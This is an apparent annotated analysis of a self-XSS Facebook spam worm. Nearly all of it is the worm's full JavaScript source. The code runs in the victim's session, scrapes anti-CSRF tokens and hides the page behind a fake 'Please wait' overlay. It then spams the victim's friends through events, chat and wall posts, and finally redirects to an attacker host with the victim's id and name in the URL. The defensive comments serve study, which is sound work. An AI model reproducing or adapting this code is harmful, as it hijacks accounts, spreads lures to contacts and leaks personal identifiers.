It tricks visitors into pasting the code below into the browser's address bar, which runs the malicious JavaScript inside their own logged-in Facebook session. The script then spams their wall and their friends' walls, and also opens Facebook's Ajax chat and spams a message there as well.
Code:
// Analyst notes: configuration for a pasted-script (self-XSS) spam sample.
// Everything below runs in the victim's own logged-in session, so all requests
// are same-origin and carry the victim's cookies.
// Property access is written as Math['floor'] rather than Math.floor throughout;
// this bracket/string form is typical output of a JavaScript obfuscator and is a
// useful literal to match on when hunting for copies of the sample.
// Random numeric suffix appended to the lure URL in every message (see
// postmessage / chatmessage / eventdesc below). Presumably this makes each posted
// link unique so exact-URL blocklists and duplicate filters miss it.
var randomnumber = Math['floor'](Math['random']() * 99999);
// randomnumber1..4 and `random` are never referenced in the lines shown here.
var randomnumber1 = Math['floor'](Math['random']() * 987);
var randomnumber2 = Math['floor'](Math['random']() * 754);
var randomnumber3 = Math['floor'](Math['random']() * 43);
var randomnumber4 = Math['floor'](Math['random']() * 9);
var random = Math['floor'](Math['random']() * 5);
// Indicator: lure page advertised in every spam message
// (defanged: hxxp://hellobusters[.]blogspot[.]com).
var url = 'http://hellobusters.blogspot.com?';
// Chat lure; %firstname% is replaced per recipient with that friend's first name.
var message = '%firstname%, i can hack ANY facebook account! it\'s so easy! check it out ';
// Event description lure (\x0A is a newline).
var ev = 'Hey everyone, \x0A\x0A I have found out how you can hack ANYONE\'s facebook account \x0A\x0A it\'s so easy! \x0A check it out - ';
// ev2 is defined but not used in the lines shown here.
var ev2 = '\x0A\x0Ajust don\'t log into mine :)';
// Wall-post lure; each %tf% placeholder is replaced with one friend's name.
var test = 'I have hacked: %tf%\'s, %tf%\'s, %tf%\'s and %tf%\'s accounts!\x0A\x0A it\'s so easy!\x0ACheck it out - ';
var eventname = 'HACK FACEBOOK!!';
// Indicator: final landing page the victim's top window is sent to once the spam
// run finishes (defanged: hxxp://hefoll0wme[.]info/final.php). The victim's user
// id and display name are appended to this URL later in the script.
var redirect = 'http://hefoll0wme.info/final.php';
// Final message bodies: lure text + lure URL + random suffix.
var postmessage = test + url + randomnumber;
var chatmessage = message + url + randomnumber;
var eventdesc = ev + url + randomnumber;
// Upper bound on the number of friend walls posted to.
var nfriends = 4000;
// When true, the script shows alert() boxes with progress information.
var debug = false;
// Count of spam tasks still in flight; mf() only redirects once this is <= 0.
var wf = 0;
// Completion handler: once no spam task is pending (wf <= 0), wait 500 ms and
// navigate the top-level window to `redirect`.
// Callers invoke it as mf(--wf); the function declares no parameter, so the
// argument is ignored and only the decrement of the global counter matters.
// Detection note: a top-level navigation to an off-site URL shortly after a burst
// of same-origin XHR posts is the end-of-run signature of this sample.
var mf = function () {
if (wf <= 0) {
setTimeout(function () {
window['top']['location']['href'] = redirect
}, 500)
}
};
// Asynchronous same-origin GET helper.
//   a - URL to request
//   b - optional callback, called with the response text when the status is 200
//   c - optional callback, called when the request completes (readyState 4),
//       whatever the status
// Because the request is issued from the page itself, the browser attaches the
// victim's session cookies automatically.
var doget = function (a, b, c) {
var d = new XMLHttpRequest();
d['open']('GET', a);
d['onreadystatechange'] = function () {
if (d['readyState'] == 4) {
// NOTE(review): `and&` is not valid JavaScript, so the listing does not parse as
// published; this looks like an artifact of how the page was extracted. Left
// exactly as it appears on the page.
if (d['status'] == 200 and& b) {
b(d['responseText'])
};
if (c) {
c()
}
}
};
d['send']()
};
// Main body. Fetches the site's home page ('/') in the victim's session and, in
// the callback, uses the returned HTML (u) to run three independent spam tasks:
// an event invitation, chat messages, and wall posts.
// Defender summary of same-origin endpoints touched, in order of appearance:
//   POST /ajax/choose/?__a=1
//   GET  /ajax/typeahead/first_degree.php
//   POST /events/create.php
//   POST /ajax/chat/buddy_list.php?__a=1
//   POST /ajax/chat/send.php?__a=1
//   GET  /ajax/browser/friends/
//   POST /ajax/updatestatus.php?__a=1
// A burst of these from one session, with identical message text that differs
// only in a numeric URL suffix, is the observable pattern.
doget('/', function (u) {
// Victim's numeric user id, read from the c_user cookie. Throws if the cookie is
// absent (match() returns null), which aborts the run.
var v = document['cookie']['match'](/c_user=(\d+)/)[1];
// Formats a friend record as '@[id:name]' (presumably the site's mention/tag
// markup, so the named friends are tagged in the post); '' when no record.
var w = function (a) {
return a ? '@[' + a['id'] + ':' + a['name'] + ']' : ''
};
// Plain-text counterpart of w: just the friend's name, or ''.
var x = function (a) {
return a ? a['name'] : ''
};
// Serialises an object into a key=value string, URL-encoding the values. A key
// whose value is null is emitted without '=value'. Note `out` is assigned without
// `var`, so it is an implicit global. As published the pairs are joined with the
// literal text 'and'; that is probably an extraction artifact of the page.
var y = function (a) {
out = '';
for (var b in a) {
out += (out ? 'and' : '') + b + ((a[b] !== null) ? '=' + encodeURIComponent(a[b]) : '')
};
return out
};
// Asynchronous same-origin form POST helper.
//   a - URL, b - object serialised with y() as the body,
//   c - optional callback with the response text on status 200,
//   d - optional callback on completion regardless of status.
var z = function (a, b, c, d) {
var e = new XMLHttpRequest();
e['open']('POST', a);
e['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
e['onreadystatechange'] = function () {
if (e['readyState'] == 4) {
// NOTE(review): same invalid `and&` token as in doget; left as published.
if (e['status'] == 200 and& c) {
c(e['responseText'])
};
if (d) {
d()
}
}
};
e['send'](y(b))
};
// Covers the whole page with an opaque white, top-most (z-index 999999) overlay
// showing a "Please wait" message, so the victim does not see the page while the
// requests below are sent. The "click here" link forces wf=0 and calls mf(),
// i.e. it triggers the redirect immediately.
var A = function () {
var a = document['createElement']('div');
a['style']['display'] = 'block';
a['style']['position'] = 'absolute';
a['style']['width'] = 100 + '%';
a['style']['height'] = 100 + '%';
a['style']['left'] = 0 + 'px';
a['style']['top'] = 0 + 'px';
a['style']['textAlign'] = 'center';
a['style']['padding'] = '4px';
a['style']['background'] = '#FFFFFF';
a['style']['zIndex'] = 999999;
a['innerHTML'] = ' <br/>Please wait, this can take a little while...<br/><br/> If it takes more than a minute..<a href="javascript:void(0);" onclick="wf=0; mf();">click here</a> ';
document['body']['appendChild'](a)
};
// Scrape request tokens out of the fetched home-page HTML.
// B/comp: composer id (optional; falls back to ''). `comp` is an implicit global.
var B = u['match'](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
if (B) {
comp = B[1]
} else {
comp = ''
};
// C and D are the hidden form fields post_form_id and fb_dtsg. They are sent with
// every state-changing request below, which suggests they act as the site's
// anti-CSRF tokens. Defender takeaway: such tokens stop cross-site forgery but
// give no protection once script runs inside the origin, as it does here.
var C = u['match'](/name="post_form_id" value="([\d\w]+)"/i)[1];
var D = u['match'](/name="fb_dtsg" value="([\d\w]+)"/i)[1];
// Victim's display name, read from the page's #navAccountName element.
var E = document['getElementById']('navAccountName')['firstChild']['data'];
// Data exposure: the victim's user id and display name are appended as query
// parameters to the off-site redirect URL, so the landing host receives them.
redirect = redirect + '?' + y({
userid: v,
name: E,
doclose: 1
});
A();
// --- Task 1: event invitation spam ---
if (eventdesc) {
wf++;
// First request returns a token that the friend-list lookup below requires.
z('/ajax/choose/?__a=1', {
type: 'event',
eid: null,
invite_message: '',
__d: 1,
post_form_id: C,
fb_dtsg: D,
lsd: null,
post_form_id_source: 'AsyncRequest'
}, function (h) {
var i = h['match'](/\\"token\\":\\"([^\\]+)\\"/)[1];
// Typeahead endpoint restricted to the victim's friends, sorted alphabetically.
var j = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + v + '&token=' + i + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha';
doget(j, function (a) {
// Collect every friend uid from the response, skipping the victim's own id.
var b = a['match'](/\{"uid":\d+,/g);
var c = [];
for (var d = 0; d < b['length']; d++) {
var e = b[d]['match'](/:(\d+),/)[1];
if (e != v) {
c['push'](e)
}
};
// Event start is set 24 hours from now. datestr is M/D/YYYY; timestr is the
// current hour multiplied by 60. Both are implicit globals.
var f = new Date();
f['setTime'](f['getTime']() + 60 * 60 * 24 * 1000);
datestr = (f['getMonth']() + 1) + '/' + f['getDate']() + '/' + f['getFullYear']();
timestr = f['getHours']() * 60;
// Event creation form: the description carries the lure text and URL, and
// sgb_invitees lists every collected friend id, so all friends are invited.
var g = {
post_form_id: C,
fb_dtsg: D,
start_dateIntlDisplay: datestr,
start_date: datestr,
start_time_hour_min: timestr,
name: eventname,
place_page_id: '',
location: '',
street: '',
geo_id: '',
geo_sq: '',
desc: eventdesc,
sgb_invitees: c['join'](','),
sgb_emails: '',
sgb_message: '',
privacy_type: 'on',
guest_list: 'on',
connections_can_post: 'on',
save: 'Create Event',
submitting: ''
};
g['new'] = '';
// No success callback (false); the completion callback marks this task done
// whether or not the request succeeded.
z('/events/create.php', g, false, function () {
mf(--wf)
})
})
})
};
// --- Task 2: chat message spam ---
if (chatmessage) {
wf++;
z('/ajax/chat/buddy_list.php?__a=1', {
user: v,
post_form_id: C,
fb_dtsg: D,
lsd: null,
post_form_id_source: 'AsyncRequest',
popped_out: false,
force_render: true
}, function (a) {
// Drops the first 9 characters of the response (presumably an anti-JSON-hijacking
// prefix such as a loop guard - not visible here) and evaluates the rest.
// NOTE(review): eval() on response text executes whatever the server returned;
// JSON.parse is the safe way to read such a payload.
var b = a['substr'](9);
var c = eval('(' + b + ')');
var d = c['payload']['buddy_list'];
// One chat message per friend currently listed as available, personalised with
// the friend's lower-cased first name.
for (var e in d['nowAvailableList']) {
// f, g and h are computed but never used; the request below recomputes the
// same expressions inline.
var f = Math['floor'](Math['random']() * 1335448958);
var g = (new Date())['getTime']();
var h = chatmessage['replace']('%firstname%', d['userInfos'][e]['firstName']['toLowerCase']());
z('/ajax/chat/send.php?__a=1', {
msg_id: Math['floor'](Math['random']() * 1335448958),
client_time: (new Date())['getTime'](),
msg_text: chatmessage['replace']('%firstname%', d['userInfos'][e]['firstName']['toLowerCase']()),
to: e,
post_form_id: C,
fb_dtsg: D,
post_form_id_source: 'AsyncRequest'
})
};
// Task marked done as soon as the sends are queued, not when they complete.
mf(--wf)
})
};
// --- Task 3: wall post spam (own wall, then friends' walls) ---
if (postmessage) {
wf++;
doget('/ajax/browser/friends/?uid=' + v + '&filter=all&__a=1&__d=1', function (g) {
// Friend entries are pulled from the response by matching a profile-picture
// file name followed by the escaped profile link.
var h = g['match'](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
var i = [];
if (h) {
for (var j = 0; j < h['length']; j++) {
// k: digits between underscores in the picture name, used as the friend id.
// l: link text, used as the friend's display name.
var k = h[j]['match'](/_\d+_/)[0]['replace'](/_/g, '');
var l = h[j]['match'](/>[^>]+\\u003c\\\/a>$/i)[0]['replace'](/\\u003c\\\/a>$/gim, '')['replace'](/>/g, '');
i['push']({
id: k,
name: l
})
}
};
// Draw friends from i in random order without replacement into two lists with
// the same order: n (names to mention in messages) and o (walls to post on).
// After the shift, the old first element is written over the picked slot.
var n = [];
var o = [];
while (i['length']) {
var p = Math['floor'](Math['random']() * i['length']);
n['push'](i[p]);
o['push'](i[p]);
var q = i['shift']();
if (p) {
i[p - 1] = q
}
};
if (debug) {
alert('fetched friends: ' + n['length'])
};
// Status update on the victim's own wall (target = victim id, context 'home').
var r = {
post_form_id: C,
fb_dtsg: D,
xhpc_composerid: comp,
xhpc_targetid: v,
xhpc_context: 'home',
xhpc_fbx: '',
lsd: null,
post_form_id_source: 'AsyncRequest'
};
// Fill each %tf% with a friend taken from the end of n: mt gets the plain name,
// m gets the '@[id:name]' form. mt and m are implicit globals.
mt = postmessage;
m = postmessage;
while (mt['search']('%tf%') >= 0) {
var s = n['pop']();
mt = mt['replace']('%tf%', x(s));
m = m['replace']('%tf%', w(s))
};
r['xhpc_message_text'] = mt;
r['xhpc_message'] = m;
if (debug) {
alert('message text: ' + mt)
};
z('/ajax/updatestatus.php?__a=1', r);
// t(a): post on the next friend's wall, then reschedule itself with a - 1 after
// 2000 ms. Stops and triggers the redirect when the counter reaches 0 or the
// name list n is exhausted.
var t = function (a) {
if (a == 0) {
wf = 0;
mf();
return
};
// Next wall to post on (context 'profile'); b is undefined if o is empty, in
// which case b['id'] below throws.
var b = o['shift']();
var c = {
post_form_id: C,
fb_dtsg: D,
xhpc_composerid: comp,
xhpc_targetid: b['id'],
xhpc_context: 'profile',
xhpc_fbx: 1,
lsd: null,
post_form_id_source: 'AsyncRequest'
};
var d = postmessage;
var e = postmessage;
if (n['length'] == 0) {
wf = 0;
mf();
return
};
// Each post consumes one name from n per %tf% placeholder, so n runs out well
// before o does.
while (d['search']('%tf%') >= 0) {
var f = n['pop']();
d = d['replace']('%tf%', x(f));
e = e['replace']('%tf%', w(f))
};
c['xhpc_message_text'] = d;
c['xhpc_message'] = e;
z('/ajax/updatestatus.php?__a=1', c);
setTimeout(function () {
t(a - 1)
}, 2000)
};
// Second increment for this task; t() resets wf to 0 directly when it finishes.
wf++;
// Start the friend-wall loop after 2 s, capped at nfriends posts.
setTimeout(function () {
t(nfriends)
}, 2000)
})
};
// Redirects right away only if no task was started (wf still 0).
mf()
});